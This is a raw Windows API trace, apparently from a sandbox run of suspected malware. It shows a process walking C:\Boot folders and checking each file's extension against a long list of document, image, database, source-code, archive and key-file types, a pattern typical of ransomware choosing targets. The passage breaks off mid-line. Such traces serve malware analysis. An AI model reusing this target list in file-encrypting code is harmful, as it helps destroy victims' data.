lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0286.313] lstrlenW (lpString=".j2k") returned 4 [0286.313] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0286.313] lstrlenW (lpString=".java") returned 5 [0286.313] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0286.313] lstrlenW (lpString=".jp2") returned 4 [0286.313] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0286.313] lstrlenW (lpString=".jpc") returned 4 [0286.313] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0286.313] lstrlenW (lpString=".jpe") returned 4 [0286.313] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0286.313] lstrlenW (lpString=".jpeg") returned 5 [0286.313] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0286.313] lstrlenW (lpString=".jpf") returned 4 [0286.313] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0286.313] lstrlenW (lpString=".jpg") returned 4 [0286.313] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.313] lstrlenW (lpString=".jpx") returned 4 [0286.313] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0286.313] lstrlenW (lpString=".js") returned 3 [0286.313] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0286.313] lstrlenW (lpString=".jsf") returned 4 [0286.313] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0286.313] lstrlenW (lpString=".json") returned 5 [0286.313] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0286.313] lstrlenW (lpString=".jsp") returned 4 [0286.313] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0286.313] lstrlenW (lpString=".kdc") returned 4 [0286.313] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0286.313] lstrlenW (lpString=".kmz") returned 4 [0286.313] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0286.313] lstrlenW (lpString=".kwm") returned 4 [0286.313] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0286.313] lstrlenW (lpString=".lasso") returned 6 [0286.313] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0286.314] lstrlenW (lpString=".lbi") returned 4 [0286.314] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0286.314] lstrlenW (lpString=".lgf") returned 4 [0286.314] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0286.314] lstrlenW (lpString=".lgp") returned 4 [0286.314] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0286.314] lstrlenW (lpString=".log") returned 4 [0286.314] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0286.314] lstrlenW (lpString=".m1v") returned 4 [0286.314] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0286.314] lstrlenW (lpString=".m4a") returned 4 [0286.314] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0286.314] lstrlenW (lpString=".m4v") returned 4 [0286.314] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0286.314] lstrlenW (lpString=".max") returned 4 [0286.314] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0286.314] lstrlenW (lpString=".md") returned 3 [0286.314] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0286.314] lstrlenW (lpString=".mda") returned 4 [0286.314] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0286.314] lstrlenW (lpString=".mdb") returned 4 [0286.314] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0286.314] lstrlenW (lpString=".mde") returned 4 [0286.314] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0286.314] lstrlenW (lpString=".mdf") returned 4 [0286.314] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0286.315] lstrlenW (lpString=".mdw") returned 4 [0286.315] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0286.315] lstrlenW (lpString=".mef") returned 4 [0286.315] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0286.315] lstrlenW (lpString=".mft") returned 4 [0286.315] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0286.315] lstrlenW (lpString=".mfw") returned 4 [0286.315] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0286.315] lstrlenW (lpString=".mht") returned 4 [0286.315] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0286.315] lstrlenW (lpString=".mhtml") returned 6 [0286.315] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0286.315] lstrlenW (lpString=".mka") returned 4 [0286.315] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0286.315] lstrlenW (lpString=".mkidx") returned 6 [0286.315] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0286.315] lstrlenW (lpString=".mkv") returned 4 [0286.315] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0286.315] lstrlenW (lpString=".mos") returned 4 [0286.315] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0286.315] lstrlenW (lpString=".mov") returned 4 [0286.315] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0286.315] lstrlenW (lpString=".mp3") returned 4 [0286.315] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0286.315] lstrlenW (lpString=".mp4") returned 4 [0286.315] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0286.315] lstrlenW (lpString=".mpeg") returned 5 [0286.315] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0286.315] lstrlenW (lpString=".mpg") returned 4 [0286.315] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0286.315] lstrlenW (lpString=".mpv") returned 4 [0286.316] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0286.316] lstrlenW (lpString=".mrw") returned 4 [0286.316] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0286.316] lstrlenW (lpString=".msg") returned 4 [0286.316] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0286.316] lstrlenW (lpString=".mxl") returned 4 [0286.316] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0286.316] lstrlenW (lpString=".myd") returned 4 [0286.316] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0286.316] lstrlenW (lpString=".myi") returned 4 [0286.316] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0286.316] lstrlenW (lpString=".nef") returned 4 [0286.316] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0286.316] lstrlenW (lpString=".nrw") returned 4 [0286.316] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0286.316] lstrlenW (lpString=".obj") returned 4 [0286.316] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0286.316] lstrlenW (lpString=".odb") returned 4 [0286.316] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0286.316] lstrlenW (lpString=".odc") returned 4 [0286.316] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0286.316] lstrlenW (lpString=".odm") returned 4 [0286.316] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0286.316] lstrlenW (lpString=".odp") returned 4 [0286.316] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0286.316] lstrlenW (lpString=".ods") returned 4 [0286.316] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0286.316] lstrlenW (lpString=".oft") returned 4 [0286.316] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0286.316] lstrlenW (lpString=".one") returned 4 [0286.316] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0286.316] lstrlenW (lpString=".onepkg") returned 7 [0286.316] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0286.316] lstrlenW (lpString=".onetoc2") returned 8 [0286.316] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0286.316] lstrlenW (lpString=".opt") returned 4 [0286.317] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".oqy") returned 4 [0286.317] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".orf") returned 4 [0286.317] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".p12") returned 4 [0286.317] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".p7b") returned 4 [0286.317] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".p7c") returned 4 [0286.317] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".pam") returned 4 [0286.317] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".pbm") returned 4 [0286.317] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".pct") returned 4 [0286.317] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".pcx") returned 4 [0286.317] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".pdd") returned 4 [0286.317] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".pdf") returned 4 [0286.317] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".pdp") returned 4 [0286.317] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".pef") returned 4 [0286.317] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".pem") returned 4 [0286.317] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".pff") returned 4 [0286.317] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".pfm") returned 4 [0286.317] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0286.317] lstrlenW (lpString=".pfx") returned 4 [0286.317] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0286.318] lstrlenW (lpString=".pgm") returned 4 [0286.318] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0286.318] lstrlenW (lpString=".php") returned 4 [0286.318] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0286.318] lstrlenW (lpString=".php3") returned 5 [0286.318] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0286.318] lstrlenW (lpString=".php4") returned 5 [0286.318] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0286.318] lstrlenW (lpString=".php5") returned 5 [0286.318] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0286.318] lstrlenW (lpString=".phtml") returned 6 [0286.318] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0286.318] lstrlenW (lpString=".pict") returned 5 [0286.318] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0286.318] lstrlenW (lpString=".pl") returned 3 [0286.318] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0286.318] lstrlenW (lpString=".pls") returned 4 [0286.318] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0286.318] lstrlenW (lpString=".pm") returned 3 [0286.318] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0286.318] lstrlenW (lpString=".png") returned 4 [0286.318] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0286.318] lstrlenW (lpString=".pnm") returned 4 [0286.318] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0286.318] lstrlenW (lpString=".pot") returned 4 [0286.318] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0286.318] lstrlenW (lpString=".potm") returned 5 [0286.318] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0286.318] lstrlenW (lpString=".potx") returned 5 [0286.318] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0286.318] lstrlenW (lpString=".ppa") returned 4 [0286.318] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0286.318] lstrlenW (lpString=".ppam") returned 5 [0286.318] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0286.318] lstrlenW (lpString=".ppm") returned 4 [0286.318] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0286.319] lstrlenW (lpString=".pps") returned 4 [0286.319] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0286.319] lstrlenW (lpString=".ppsm") returned 5 [0286.319] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0286.319] lstrlenW (lpString=".ppt") returned 4 [0286.319] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.319] lstrlenW (lpString=".pptm") returned 5 [0286.319] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0286.319] lstrlenW (lpString=".pptx") returned 5 [0286.319] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0286.319] lstrlenW (lpString=".prn") returned 4 [0286.319] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0286.319] lstrlenW (lpString=".ps") returned 3 [0286.319] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0286.319] lstrlenW (lpString=".psb") returned 4 [0286.319] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0286.319] lstrlenW (lpString=".psd") returned 4 [0286.319] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0286.319] lstrlenW (lpString=".pst") returned 4 [0286.319] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0286.319] lstrlenW (lpString=".ptx") returned 4 [0286.319] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0286.319] lstrlenW (lpString=".pub") returned 4 [0286.319] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0286.319] lstrlenW (lpString=".pwm") returned 4 [0286.319] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0286.319] lstrlenW (lpString=".pxr") returned 4 [0286.320] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0286.320] lstrlenW (lpString=".py") returned 3 [0286.320] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0286.320] lstrlenW (lpString=".qt") returned 3 [0286.320] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0286.320] lstrlenW (lpString=".r3d") returned 4 [0286.320] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0286.320] lstrlenW (lpString=".raf") returned 4 [0286.320] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0286.320] lstrlenW (lpString=".rar") returned 4 [0286.320] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.320] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fdc0d7, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.320] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fdc0d7, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.320] FindClose (in: hFindFile=0x39483a8 | out: hFindFile=0x39483a8) returned 1 [0286.320] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.320] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0286.321] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.321] lstrlenW (lpString="C:\\Boot\\lt-LT") returned 13 [0286.321] FindFirstFileW (in: lpFileName="C:\\Boot\\lt-LT\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ca8 [0286.321] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.321] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.321] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.321] lstrlenW (lpString=".1cd") returned 4 [0286.321] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.321] lstrlenW (lpString=".3ds") returned 4 [0286.321] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0286.321] lstrlenW (lpString=".3fr") returned 4 [0286.321] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0286.321] lstrlenW (lpString=".3g2") returned 4 [0286.321] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0286.321] lstrlenW (lpString=".3gp") returned 4 [0286.321] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0286.321] lstrlenW (lpString=".7z") returned 3 [0286.321] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.321] lstrlenW (lpString=".accda") returned 6 [0286.321] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0286.321] lstrlenW (lpString=".accdb") returned 6 [0286.321] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0286.321] lstrlenW (lpString=".accdc") returned 6 [0286.321] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0286.321] lstrlenW (lpString=".accde") returned 6 [0286.322] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0286.322] lstrlenW (lpString=".accdt") returned 6 [0286.322] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0286.322] lstrlenW (lpString=".accdw") returned 6 [0286.322] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0286.322] lstrlenW (lpString=".adb") returned 4 [0286.322] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0286.322] lstrlenW (lpString=".adp") returned 4 [0286.322] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0286.322] lstrlenW (lpString=".ai") returned 3 [0286.322] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0286.322] lstrlenW (lpString=".ai3") returned 4 [0286.322] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0286.322] lstrlenW (lpString=".ai4") returned 4 [0286.322] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0286.322] lstrlenW (lpString=".ai5") returned 4 [0286.322] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0286.322] lstrlenW (lpString=".ai6") returned 4 [0286.322] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0286.322] lstrlenW (lpString=".ai7") returned 4 [0286.322] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0286.322] lstrlenW (lpString=".ai8") returned 4 [0286.322] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0286.322] lstrlenW (lpString=".anim") returned 5 [0286.322] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0286.322] lstrlenW (lpString=".arw") returned 4 [0286.322] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0286.322] lstrlenW (lpString=".as") returned 3 [0286.322] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0286.322] lstrlenW (lpString=".asa") returned 4 [0286.322] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0286.322] lstrlenW (lpString=".asc") returned 4 [0286.322] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0286.322] lstrlenW (lpString=".ascx") returned 5 [0286.323] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0286.323] lstrlenW (lpString=".asm") returned 4 [0286.323] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0286.323] lstrlenW (lpString=".asmx") returned 5 [0286.323] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0286.323] lstrlenW (lpString=".asp") returned 4 [0286.323] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0286.323] lstrlenW (lpString=".aspx") returned 5 [0286.323] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0286.323] lstrlenW (lpString=".asr") returned 4 [0286.323] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0286.323] lstrlenW (lpString=".asx") returned 4 [0286.323] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0286.323] lstrlenW (lpString=".avi") returned 4 [0286.323] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0286.323] lstrlenW (lpString=".avs") returned 4 [0286.323] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0286.323] lstrlenW (lpString=".backup") returned 7 [0286.323] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0286.323] lstrlenW (lpString=".bak") returned 4 [0286.323] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0286.323] lstrlenW (lpString=".bay") returned 4 [0286.323] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0286.323] lstrlenW (lpString=".bd") returned 3 [0286.323] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0286.323] lstrlenW (lpString=".bin") returned 4 [0286.323] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0286.323] lstrlenW (lpString=".bmp") returned 4 [0286.323] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0286.323] lstrlenW (lpString=".bz2") returned 4 [0286.323] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.323] lstrlenW (lpString=".c") returned 2 [0286.323] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0286.323] lstrlenW (lpString=".cdr") returned 4 [0286.324] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0286.324] lstrlenW (lpString=".cer") returned 4 [0286.324] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0286.324] lstrlenW (lpString=".cf") returned 3 [0286.324] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0286.324] lstrlenW (lpString=".cfc") returned 4 [0286.324] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0286.324] lstrlenW (lpString=".cfm") returned 4 [0286.324] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0286.324] lstrlenW (lpString=".cfml") returned 5 [0286.324] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0286.324] lstrlenW (lpString=".cfu") returned 4 [0286.324] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0286.324] lstrlenW (lpString=".chm") returned 4 [0286.324] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0286.324] lstrlenW (lpString=".cin") returned 4 [0286.324] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0286.324] lstrlenW (lpString=".class") returned 6 [0286.324] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0286.324] lstrlenW (lpString=".clx") returned 4 [0286.324] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0286.324] lstrlenW (lpString=".config") returned 7 [0286.324] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0286.324] lstrlenW (lpString=".cpp") returned 4 [0286.324] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0286.324] lstrlenW (lpString=".cr2") returned 4 [0286.324] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0286.324] lstrlenW (lpString=".crt") returned 4 [0286.324] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0286.324] lstrlenW (lpString=".crw") returned 4 [0286.324] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0286.324] lstrlenW (lpString=".cs") returned 3 [0286.324] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0286.324] lstrlenW (lpString=".css") returned 4 [0286.324] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0286.324] lstrlenW (lpString=".csv") returned 4 [0286.325] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0286.325] lstrlenW (lpString=".cub") returned 4 [0286.325] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0286.325] lstrlenW (lpString=".dae") returned 4 [0286.325] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0286.325] lstrlenW (lpString=".dat") returned 4 [0286.325] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0286.325] lstrlenW (lpString=".db") returned 3 [0286.325] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0286.325] lstrlenW (lpString=".dbf") returned 4 [0286.325] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.325] lstrlenW (lpString=".dbx") returned 4 [0286.325] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0286.325] lstrlenW (lpString=".dc3") returned 4 [0286.325] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0286.325] lstrlenW (lpString=".dcm") returned 4 [0286.325] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0286.325] lstrlenW (lpString=".dcr") returned 4 [0286.325] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0286.325] lstrlenW (lpString=".der") returned 4 [0286.325] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0286.325] lstrlenW (lpString=".dib") returned 4 [0286.325] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0286.325] lstrlenW (lpString=".dic") returned 4 [0286.325] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0286.325] lstrlenW (lpString=".dif") returned 4 [0286.325] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0286.325] lstrlenW (lpString=".divx") returned 5 [0286.325] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0286.325] lstrlenW (lpString=".djvu") returned 5 [0286.325] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0286.325] lstrlenW (lpString=".dng") returned 4 [0286.325] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0286.325] lstrlenW (lpString=".doc") returned 4 [0286.325] lstrcmpiW (lpString1=".doc", lpString2=".mui") 